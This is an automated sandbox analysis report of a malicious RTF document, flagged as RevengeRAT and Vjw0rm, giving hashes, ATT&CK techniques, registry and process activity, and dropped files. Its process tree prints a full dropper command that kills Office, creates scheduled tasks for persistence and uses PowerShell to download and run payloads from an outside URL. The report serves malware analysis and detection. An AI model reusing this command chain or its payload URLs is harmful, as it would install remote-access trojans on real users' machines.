revengerat | d298f6741d1e6df0f9201d86e9bc89c29f0f37e3c437498f3f5471a56ad80fa0

Analysis

max time kernel
150s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
20-09-2024 02:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eca7e438ad10709a7f1816a406023a61_JaffaCakes118.rtf
Size

1.6MB
MD5

eca7e438ad10709a7f1816a406023a61
SHA1

caed3687be32d80134c4efb1e0ed2e5c0d018cb7
SHA256

d298f6741d1e6df0f9201d86e9bc89c29f0f37e3c437498f3f5471a56ad80fa0
SHA512

7780daa4f8bd3c7fe985018c05e0fa9d38bb4787e40e2652d351393a0b3367447b46e29ec02e92caf554bb96e906ff1e9d805efa2b02caffafecd52b29ac1cb0
SSDEEP

12288:J/Z2/ZX/ZY/ZZ/ZC/ZD/ZU/ZF/Zv/Z3/Zs/Z1/Zq/ZT/ZI/ZB/Zm/ZZ/Ze/Z0/Zc:HqBQ3elEbJhMrWVgP63ikZuTl

Score

10^/10

revengerat vjw0rm discovery execution stealer trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://120842333-887063928606937956.preview.editmysite.com/uploads/1/2/0/8/120842333/itr.docx

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://120842333-887063928606937956.preview.editmysite.com/uploads/1/2/0/8/120842333/itr2.docx

Extracted

Family

revengerat

Mutex

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4696	4028	cmd.exe	EXCEL.EXE

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat
Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm

RevengeRat Executable 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/3892-93-0x00000000016B0000-0x00000000016B8000-memory.dmp	revengerat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

27 2520 powershell.exe
35 4000 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

ServicesGoogleTasks4.exe

pid process

3892 ServicesGoogleTasks4.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2520 powershell.exe
4000 powershell.exe
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 11 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

4884 PING.EXE
3724 PING.EXE
2956 PING.EXE
4432 PING.EXE
4388 PING.EXE
5100 PING.EXE
4952 PING.EXE
404 PING.EXE
1672 PING.EXE
3656 PING.EXE
3756 PING.EXE

flow	pid	process
27	2520	powershell.exe
35	4000	powershell.exe

pid	process
3892	ServicesGoogleTasks4.exe

pid	process
2520	powershell.exe
4000	powershell.exe

pid	process
4884	PING.EXE
3724	PING.EXE
2956	PING.EXE
4432	PING.EXE
4388	PING.EXE
5100	PING.EXE
4952	PING.EXE
404	PING.EXE
1672	PING.EXE
3656	PING.EXE
3756	PING.EXE

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEServicesGoogleTasks4.exeWINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	ServicesGoogleTasks4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ServicesGoogleTasks4.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEWINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid process

3532 ipconfig.exe
3384 ipconfig.exe
1192 ipconfig.exe
3956 ipconfig.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4748 taskkill.exe
2488 taskkill.exe
Runs ping.exe 1 TTPs 11 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

404 PING.EXE
4432 PING.EXE
1672 PING.EXE
3656 PING.EXE
3756 PING.EXE
3724 PING.EXE
4952 PING.EXE
2956 PING.EXE
4388 PING.EXE
5100 PING.EXE
4884 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

1096 schtasks.exe
2156 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

1992 WINWORD.EXE
1992 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

2520 powershell.exe
2520 powershell.exe
4000 powershell.exe
4000 powershell.exe

pid	process
3532	ipconfig.exe
3384	ipconfig.exe
1192	ipconfig.exe
3956	ipconfig.exe

pid	process
4748	taskkill.exe
2488	taskkill.exe

pid	process
404	PING.EXE
4432	PING.EXE
1672	PING.EXE
3656	PING.EXE
3756	PING.EXE
3724	PING.EXE
4952	PING.EXE
2956	PING.EXE
4388	PING.EXE
5100	PING.EXE
4884	PING.EXE

pid	process
1096	schtasks.exe
2156	schtasks.exe

pid	process
1992	WINWORD.EXE
1992	WINWORD.EXE

pid	process
2520	powershell.exe
2520	powershell.exe
4000	powershell.exe
4000	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exepowershell.exeServicesGoogleTasks4.exe

description	pid	process
Token: SeDebugPrivilege	2488	taskkill.exe
Token: SeDebugPrivilege	4748	taskkill.exe
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeDebugPrivilege	3892	ServicesGoogleTasks4.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXEEXCEL.EXE

pid process

1992 WINWORD.EXE
1992 WINWORD.EXE
1992 WINWORD.EXE
4028 EXCEL.EXE
4028 EXCEL.EXE
4028 EXCEL.EXE
4028 EXCEL.EXE

pid	process
1992	WINWORD.EXE
1992	WINWORD.EXE
1992	WINWORD.EXE
4028	EXCEL.EXE
4028	EXCEL.EXE
4028	EXCEL.EXE
4028	EXCEL.EXE

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

EXCEL.EXEcmd.exe

description	pid	process	target process
PID 4028 wrote to memory of 4696	4028	EXCEL.EXE	cmd.exe
PID 4028 wrote to memory of 4696	4028	EXCEL.EXE	cmd.exe
PID 4696 wrote to memory of 2488	4696	cmd.exe	taskkill.exe
PID 4696 wrote to memory of 2488	4696	cmd.exe	taskkill.exe
PID 4696 wrote to memory of 4748	4696	cmd.exe	taskkill.exe
PID 4696 wrote to memory of 4748	4696	cmd.exe	taskkill.exe
PID 4696 wrote to memory of 4432	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 4432	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 1096	4696	cmd.exe	schtasks.exe
PID 4696 wrote to memory of 1096	4696	cmd.exe	schtasks.exe
PID 4696 wrote to memory of 4388	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 4388	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 2156	4696	cmd.exe	schtasks.exe
PID 4696 wrote to memory of 2156	4696	cmd.exe	schtasks.exe
PID 4696 wrote to memory of 1672	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 1672	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 2520	4696	cmd.exe	powershell.exe
PID 4696 wrote to memory of 2520	4696	cmd.exe	powershell.exe
PID 4696 wrote to memory of 5100	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 5100	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 4000	4696	cmd.exe	powershell.exe
PID 4696 wrote to memory of 4000	4696	cmd.exe	powershell.exe
PID 4696 wrote to memory of 3656	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 3656	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 3532	4696	cmd.exe	ipconfig.exe
PID 4696 wrote to memory of 3532	4696	cmd.exe	ipconfig.exe
PID 4696 wrote to memory of 4884	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 4884	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 3384	4696	cmd.exe	ipconfig.exe
PID 4696 wrote to memory of 3384	4696	cmd.exe	ipconfig.exe
PID 4696 wrote to memory of 3756	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 3756	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 1192	4696	cmd.exe	ipconfig.exe
PID 4696 wrote to memory of 1192	4696	cmd.exe	ipconfig.exe
PID 4696 wrote to memory of 3724	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 3724	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 1308	4696	cmd.exe	schtasks.exe
PID 4696 wrote to memory of 1308	4696	cmd.exe	schtasks.exe
PID 4696 wrote to memory of 4952	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 4952	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 836	4696	cmd.exe	schtasks.exe
PID 4696 wrote to memory of 836	4696	cmd.exe	schtasks.exe
PID 4696 wrote to memory of 2956	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 2956	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 3956	4696	cmd.exe	ipconfig.exe
PID 4696 wrote to memory of 3956	4696	cmd.exe	ipconfig.exe
PID 4696 wrote to memory of 404	4696	cmd.exe	PING.EXE
PID 4696 wrote to memory of 404	4696	cmd.exe	PING.EXE

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eca7e438ad10709a7f1816a406023a61_JaffaCakes118.rtf" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1992

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "taskkill /f /im winword.exe & taskkill /f /im excel.exe & ping -n 3 localhost & schtasks /create /tn "GoogleTasksChromeServ4" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\GoogleTasksChromeServ4.js" /sc minute /mo 3 /f & ping -n 3 localhost & schtasks /create /tn "ServicesGoogleTasks4" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\ServicesGoogleTasks4.exe" /sc minute /mo 3 /f & ping -n 3 localhost & PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://120842333-887063928606937956.preview.editmysite.com/uploads/1/2/0/8/120842333/itr.docx”, “%AppData%\\Microsoft\\GoogleTasksChromeServ4.js”) & ping -n 3 localhost & PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://120842333-887063928606937956.preview.editmysite.com/uploads/1/2/0/8/120842333/itr2.docx”, “%AppData%\\Microsoft\\ServicesGoogleTasks4.exe”) & ping -n 3 localhost & ipconfig/release & ping -n 3 localhost & ipconfig/release & ping -n 3 localhost & ipconfig/release & ping -n 3 localhost & schtasks /run /tn "ServicesGoogleTasks4" & ping -n 3 localhost & schtasks /run /tn "GoogleTasksChromeServ4" & ping -n 60 localhost & ipconfig/renew & ping -n 3 localhost & exit"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4696
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im winword.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2488
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im excel.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4748
- - C:\Windows\system32\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4432
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleTasksChromeServ4" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\GoogleTasksChromeServ4.js" /sc minute /mo 3 /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1096
- - C:\Windows\system32\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4388
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "ServicesGoogleTasks4" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\ServicesGoogleTasks4.exe" /sc minute /mo 3 /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2156
- - C:\Windows\system32\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://120842333-887063928606937956.preview.editmysite.com/uploads/1/2/0/8/120842333/itr.docx”, “C:\Users\Admin\AppData\Roaming\\Microsoft\\GoogleTasksChromeServ4.js”)
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2520
- - C:\Windows\system32\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://120842333-887063928606937956.preview.editmysite.com/uploads/1/2/0/8/120842333/itr2.docx”, “C:\Users\Admin\AppData\Roaming\\Microsoft\\ServicesGoogleTasks4.exe”)
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4000
- - C:\Windows\system32\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3656
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:3532
- - C:\Windows\system32\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4884
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:3384
- - C:\Windows\system32\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3756
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:1192
- - C:\Windows\system32\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3724
- - C:\Windows\system32\schtasks.exe
    schtasks /run /tn "ServicesGoogleTasks4"
    3⤵
    PID:1308
- - C:\Windows\system32\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4952
- - C:\Windows\system32\schtasks.exe
    schtasks /run /tn "GoogleTasksChromeServ4"
    3⤵
    PID:836
- - C:\Windows\system32\PING.EXE
    ping -n 60 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2956
- - C:\Windows\system32\ipconfig.exe
    ipconfig /renew
    3⤵
    - Gathers network information
    PID:3956
- - C:\Windows\system32\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:404

C:\Users\Admin\AppData\Roaming\Microsoft\ServicesGoogleTasks4.exe
C:\Users\Admin\AppData\Roaming\Microsoft\ServicesGoogleTasks4.exe
1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:3892

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\Microsoft\GoogleTasksChromeServ4.js"
1⤵
PID:4384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\B2F071E4-BE71-4796-AB38-5DC802CD4C3F

Filesize
171KB

MD5
d24e26a824a10592811cb68e180c5dad

SHA1
91fe1b5bd0a08ab0f6c294c58077c93f763ae546

SHA256
15bcd193105a2b8200bb0d11b400a128529b23d2316ebd0260b06068fe6090c2

SHA512
0e5bc5fb5775be57449a8c9faa1f0fd9c582aa83dee2d3458a19c7582425cab12e2ddce3dafd4fdfd91f84458b7cf0a95eb8e423023549608c30f3914ccb29bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Filesize
2KB

MD5
160a4852fcd871ffcedc9cdd8f4301e2

SHA1
1f9a1c87efc0a3d1ea81b32d129ac8086154a91b

SHA256
afde67c5cb0eba64b817c1711445ab3e014483a615390440883336ef9f935e7a

SHA512
c517a22dc65b05dd62778047311f43e8a15871bf430de6b7724d7ea1cf016fd664f5fcff513a4d34e792341b32a9972f23cb4ea990d8b5cbe36f50e6d0980c65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
810e72b0724b33db5788c765bb82e8aa

SHA1
849b8449b7b3314b584f69f09e08a3189b707d8e

SHA256
98123c6bd982bb00f0bd116277cbe2d7bdbf6d013c789e989a7e30f83f1ef1dd

SHA512
55e90ddbb741fcfd0b3f8d2292e2b3e50a3d69977275e4f108d901bdd846af819ed56acd31489a1d9b1cb1bcf83d38a6d362aef667f6cee31f7b54f9f5a77018

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ow0fnenr.nsf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\GoogleTasksChromeServ4.js

Filesize
3KB

MD5
053ccf95b837cb30f9cd336a42f257f9

SHA1
4b5cd59eff17de416d9db4e8522926cf3fbc287e

SHA256
9273f3068b99f5de85bf73135ef1db95bf43a86ca1400ddcdf2f59a570bc6471

SHA512
421db6f374ee1ebddf17af5cd8d474022a15fd9414453c7c6b26eaf0e43b95d3c36a326d8cf38606d17f5f93cc71ccd2212af34f8c95c83d2b2aa535ba088d50

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\ServicesGoogleTasks4.exe

Filesize
84KB

MD5
3bafc4afbd3e6251a3ea3cb94879eb8c

SHA1
fb16aeaf3b3c4f8b3044e3a2ecaa7a50cafaa3e8

SHA256
dbafb09a563bbcc4f1d7d8ea963eabbb77d301b4438f43096924eb2c3f513712

SHA512
7400600b43f5bca7986616bbd50b9d16f7b9b5753a68c128872737fd2bd65e6285bef8a48ea0b9d9e42d9a8d25a71ef16cb44ebe504b281cce12bf0cd2ed7ace

Download Submit
memory/1992-21-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-2-0x00007FFDF5B90000-0x00007FFDF5BA0000-memory.dmp

Filesize
64KB

Download
memory/1992-14-0x00007FFDF3560000-0x00007FFDF3570000-memory.dmp

Filesize
64KB

Download
memory/1992-11-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-10-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-7-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-16-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-17-0x00007FFDF3560000-0x00007FFDF3570000-memory.dmp

Filesize
64KB

Download
memory/1992-18-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-20-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-4-0x00007FFDF5B90000-0x00007FFDF5BA0000-memory.dmp

Filesize
64KB

Download
memory/1992-19-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-15-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-6-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-5-0x00007FFDF5B90000-0x00007FFDF5BA0000-memory.dmp

Filesize
64KB

Download
memory/1992-3-0x00007FFDF5B90000-0x00007FFDF5BA0000-memory.dmp

Filesize
64KB

Download
memory/1992-12-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-8-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-9-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-62-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/1992-1-0x00007FFE35BAD000-0x00007FFE35BAE000-memory.dmp

Filesize
4KB

Download
memory/1992-0-0x00007FFDF5B90000-0x00007FFDF5BA0000-memory.dmp

Filesize
64KB

Download
memory/1992-13-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/2520-70-0x0000022A39200000-0x0000022A39222000-memory.dmp

Filesize
136KB

Download
memory/3892-92-0x000000001BC60000-0x000000001BD06000-memory.dmp

Filesize
664KB

Download
memory/3892-93-0x00000000016B0000-0x00000000016B8000-memory.dmp

Filesize
32KB

Download
memory/3892-94-0x000000001C2E0000-0x000000001C7AE000-memory.dmp

Filesize
4.8MB

Download
memory/3892-95-0x000000001C820000-0x000000001C882000-memory.dmp

Filesize
392KB

Download
memory/4028-63-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/4028-39-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download
memory/4028-35-0x00007FFE35B10000-0x00007FFE35D05000-memory.dmp

Filesize
2.0MB

Download